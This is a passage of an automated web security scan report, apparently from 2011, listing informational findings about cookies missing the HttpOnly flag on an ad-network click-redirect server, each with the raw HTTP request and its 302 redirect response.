Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

14.460. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1706501308/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1706501308/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1706501308/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:06:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i
...[SNIP]...

14.461. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1708168447/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1708168447/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1708168447/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

14.462. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1710223704/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1710223704/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1710223704/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:06:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here<
...[SNIP]...

14.463. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1725875891/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1725875891/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1725875891/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:55:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

14.464. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/181770509/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/181770509/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/181770509/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:29:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.marinalife.com/soundings
Content-Length: 312
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.marinalife.com/soundings">here</a>.<
...[SNIP]...

14.465. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1839652180/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1839652180/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1839652180/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/
...[SNIP]...

14.466. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1897798837/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1897798837/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1897798837/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:12:23 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i
...[SNIP]...

14.467. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/19190715/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/19190715/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/19190715/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here<
...[SNIP]...

14.468. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1921995207/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1921995207/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1921995207/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:35:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here<
...[SNIP]...

14.469. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1925968507/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1925968507/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1925968507/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:45:18 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

14.470. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/19316522/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/19316522/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/19316522/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

14.471. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1972223152/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1972223152/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1972223152/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:46:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

14.472. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1989764170/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1989764170/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1989764170/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/
...[SNIP]...

14.473. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1990120906/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1990120906/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1990120906/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:23 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/
...[SNIP]...

14.474. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1992827791/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1992827791/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
